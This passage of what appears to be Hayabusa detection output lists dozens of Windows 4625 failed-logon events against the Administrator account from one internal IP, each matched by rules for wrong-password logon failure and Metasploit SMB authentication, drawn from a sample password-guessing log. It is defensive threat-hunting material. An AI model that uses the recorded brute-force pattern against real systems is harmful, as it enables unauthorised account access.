Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
